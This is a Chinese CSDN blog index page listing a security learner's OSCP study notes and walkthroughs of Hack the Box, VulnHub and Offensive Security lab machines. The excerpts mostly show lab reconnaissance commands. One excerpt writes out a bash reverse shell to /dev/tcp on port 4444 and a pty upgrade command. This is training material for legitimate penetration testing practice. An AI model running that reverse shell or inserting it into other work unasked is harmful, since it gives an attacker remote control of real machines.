自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

Shadow的博客

黎明的那道光会越过黑暗

  • 博客(31)
  • 收藏
  • 关注

原创 OSCP学习笔记总结(本资料禁止转载)

OSCP学习笔记第零章实战学习反弹shell bash -i >&/dev/tcp/192.168.1.1/4444 0>&1切换交互式shell python -c 'import pty;pty.spawn("/bin/sh")'查看系统型号:lab_release -a查看系统版本:uname -a查看目标主机网页内容:dirb http://192.168.1.1:80查看网页漏洞:nikto -h 192.168.1.1 --useprox.

2021-10-19 18:05:10 11074 3

原创 Offensive Sorcerer 靶机渗透

offensive 靶机

2022-04-01 16:58:23 4071

原创 Offensive Fish 靶机渗透

offensive 靶机渗透

2022-03-30 23:48:25 287

原创 Offensive Escape 靶机渗透

Offensive escape

2022-03-27 22:08:47 4632 1

原创 Offensive Meathead 靶机渗透

offensive 靶机渗透

2022-03-23 19:15:36 221

原创 Offensive Zino 靶机渗透

Offensive 靶机渗透

2022-03-21 15:46:41 3838

原创 Offensive Fail 靶机渗透

offensive fail 靶机渗透

2022-03-20 00:36:41 2694

原创 Offensive Walla 靶机渗透

offensive官方practice靶机writeup

2022-03-16 00:06:30 2548

原创 HTTP学习笔记

一、HTTP简介 维基百科上解释为:超文本传输协议(英文:HyperText Transfer Protocol,缩写:HTTP)是一种用于分布式、协作式和超媒体信息系统的应用层协议。HTTP是万维网的数据通信的基础。设计HTTP最初的目的是为了提供一种发布和接收HTML页面的方法。通过HTTP或者HTTPS协议请求的资源由统一资源标识符(Uniform Resource Identifiers,URI)来标识。二、HTTP发展历程HTTP/0.9版本,这个时候的HTTP只支持GE...

2022-03-14 17:30:46 3297

原创 OSCP历程

今天1点40,我收到了offensive发的邮件,通知我通过了oscp考试!现在总结下吧。1、笔记很重要,教材一定要看,很多细节都在教材里面,遇到新知识一定要记笔记,每做一台靶机,之后一定要写报告,把你渗透的过程,思路,记录下来。因为当时你觉得可能记住了,但是做了几十台到考试前时候你发现什么都记不住,这时候就需要过一遍你的靶机writeup来回忆相关知识点。2、官方靶机如果遇到不会的,没头绪的,可以上论坛,看看别人是怎么说的。如果一台靶机做了一天还是一点进展都没有,那就下一台吧,可能...

2021-12-08 00:12:22 1610 3

原创 Hack the Box Monitors 靶机渗透

Monitors靶机渗透目标:得到root权限,取得user.txt,root.txt作者:shadow时间:2021-07-27请注意:我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集去80端口看看添加dnsecho "10.10.10.238 monitors.htb" >> /etc/hosts二、web渗透尝试wpscan,没token的可以去官网注册一个,

2021-07-27 23:13:17 516

原创 Hack the Box Seal 靶机渗透

Seal 靶机渗透目标:得到root权限,取得user.txt,root.txt作者:shadow时间:2021-07-26请注意:我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集尝试访问8080端口,提示我们注册帐号,注册帐号后进入页面Deploy updated tomcat configuration.Disable manager and host-manager.从页面提示可以得.

2021-07-26 22:46:42 913 2

原创 Hack the Box Dynstr 靶机渗透

Dynstr 靶机渗透目标:得到root权限,取得user.txt,root.txt作者:shadow时间:2021-07-25请注意:我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集查看80端口,发现是dns的机器,而且还有用户名密码先将dns写入hosts文件echo "10.10.10.244 dnsalias.htb dynamicdns.htb no-ip.htb dyna.h.

2021-07-26 01:20:06 612

原创 Hack the Box TheNotebook 靶机渗透

TheNotebook 靶机渗透目标:得到root权限,取得user.txt,root.txt作者:shadow时间:2021-07-24请注意:我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集查看80端口home页面提示我们先注册,我们在register里注册信息注册成功,提示进入notes目录发现并没什么用,尝试抓包...

2021-07-25 20:26:25 278 2

原创 Hack the Box Love 靶机渗透

Love 靶机渗透目标:得到root权限,取得user.txt,root.txt作者:shadow时间:2021-07-23请注意:我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集打开80端口发现登录页面,暂时不尝试爆破,打开https看看重新扫描443端口修改hosts文件指定这两个域名解析的IP为靶场的IP 10.10.10.239echo "10.10.10.239 love..

2021-07-23 23:21:58 360 1

原创 Hack the Box Cap 靶机渗透

Cap 靶机渗透目标:得到root权限,取得user.txt,root.txt作者:shadow时间:2021-07-23请注意:我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集浏览器访问发现security snapshot 里面得值全为0,并且网址中data后数字还会递增,可能故意将真实数据隐藏,直接改成0尝试点击download,将下载下来得日志在wireshark中打开查看找.

2021-07-23 22:13:12 396

原创 Hack the Box Knife 靶机渗透

Knife靶机渗透目标:得到root权限,取得user.txt,root.txt作者:shadow时间:2021-07-23请注意:我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集Nikto查看漏洞,发现php版本8.1.0查找是否有已知漏洞exploitPHP 8.1.0-dev版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通..

2021-07-23 10:26:19 293 1

原创 Hack the Box Armageddon 靶机渗透

Five86-1 靶机渗透目标:得到root权限作者:shadow时间:2021-04-09请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。————————————————版权声明:本文为CSDN博主「c2hhZG93」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。原文链接:https://blog.csdn.net/qq

2021-07-22 23:22:49 779

原创 VulnHub Five86-1 靶机渗透

Five86-1 靶机渗透目标:得到root权限作者:shadow时间:2021-04-09请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集netdiscover -i eth0主机ip为172.16.1.24nmap -p- -A -T5 172.16.1.24开启了80与22端口,看到nmap上面扫描到robots.t..

2021-04-09 16:47:50 352

原创 VulnHub DepthB2R 靶机渗透

DepthB2R 靶机渗透目标:得到root权限作者:shadow时间:2021-04-08请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集主机ip为172.16.1.22nmap -p- -A -T5 172.16.1.22只开放了8080端口,我们看看是什么二、web渗透没什么发现,试试nikto扫描下ni

2021-04-08 16:06:12 436

原创 OSCP pwnlab_init 靶机渗透

pwnlab_init 靶机渗透目标:得到root权限作者:shadow时间:2021-04-07请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集netdiscover -i eth0 pwnlab_init主机ip为172.16.1.20nmap -A -p- 172.16.1.20我们看到开启了80、3306等端口,登..

2021-04-07 19:48:20 476

原创 OSCP  Raven 靶机渗透

Raven靶机渗透目标:得到root权限作者:shadow时间:2021-04-01请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集netdiscover -i eth0Raven主机ip为172.16.1.17nmap 查询开放端口nmap -p- -A 172.16.1.17查询到主机开放了80端口,打开浏览器看.

2021-04-01 18:27:02 335

原创 OSCP Brainpan 靶机渗透

Brainpan靶机渗透目标:得到root权限作者:shadow时间:2021-03-24请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集netdiscover -i eth0Brainpan主机ip为172.16.1.8然后我们nmap一下看看哪些端口是开放的nmap -p- -A 172.16.1.8只开放了9999.

2021-03-24 20:27:35 4986 6

原创 OSCP Sickos 1.1 靶机渗透

Sickos 1.1 靶机渗透目标:得到root权限作者:shadow时间:2021-03-23请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集netdiscover -i eth0Sickos 1.1主机ip为172.16.1.10nmap 扫描一下nmap -p- -A 172.16.1.10主机开放了代理服务器,

2021-03-23 18:54:07 343

原创 OSCP Lampiao 靶机渗透

Lampiao 靶机渗透目标:得到root权限作者:shadow时间:2021-03-22请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集netdiscover -i eth0Lampiao主机ip为172.16.1.15nmap扫下所有端口nmap -p- -A 172.16.1.15看下有两个http,看下80端口

2021-03-22 16:16:13 704

原创 OSCP GoldenEye 靶机渗透

GoldenEye 靶机渗透目标:得到root权限作者:shadow时间:2021-03-19请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集netdiscover -i eth0 GoldenEye主机ip为172.16.1.14nmap 端口扫描,发现开启的服务有smtp、http、pop3等等nmap -p- -A 172.

2021-03-19 19:19:15 1709 4

原创 IMAP、POP3、SMTP协议学习笔记

IMAP、POP3、SMTP协议学习笔记1、IMAP因特网报文存取协议IMAP(Internet Message Access Protocol)IMAP协议是由斯坦福大学的Mark Crispin教授在1986年开发的,后期版本是华盛顿州立大学进行开发的,IMAP4是TCP/IP协议族中的一员,现在的版本是“IMAP第四版第一次修订版”(IMAP4rev1)。IMAP4协议的特性IMAP4协议的默认端口:143IMAP4协议默认传输协议:TCP/IPIMAP4协议适...

2021-03-19 16:37:05 1725

转载 NMAP参数详解

NMAP参数详解目标选择单个扫描:nmap ip扫描主机:nmap www.XXXX.com扫描一系列IP:nmap 192.168.1.1-20扫描子网:nmap 192.168.1.1/20从文本文件获得扫描目标:nmap -iL list-of-ips.txt无ping扫描:常用于防火墙禁止ping的情况:nmap -P0 ip端口选择扫描单个端口:nmap -p 端口 ip扫描一系列端口:nmap -p 1-100 192.168.1.1扫描100个最常见

2021-03-17 17:07:13 3678 2

原创 OSCP IMF 靶机渗透

IMF 靶机渗透目标:得到root权限作者:shadow时间:2021-03-16请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集netdiscover -i eth0 imf主机ip为172.16.1.13然后我们nmap一下看看哪些端口是开放的nmap -p- -A 172.16.1.13主机只开放了80端口,登录浏览

2021-03-16 18:52:14 900 3

原创 OSCP Kioptrix Level2 靶机渗透

Kioptrix Level2 靶机渗透目标:得到root权限作者:shadow时间:2021-03-13请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。一、信息收集首先扫描靶机ipnetdiscover -i eth0 可见靶机ip为172.16.1.3nmap查看端口开放情况nmap -p- -A 172.16.1.3我们可以

2021-03-13 22:51:01 423

原创 OSCP Mr. Robot 靶机渗透

Mr. Robot 靶机渗透目标:得到root权限作者:shadow时间:2021-03-12

2021-03-12 10:10:22 1263 2

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除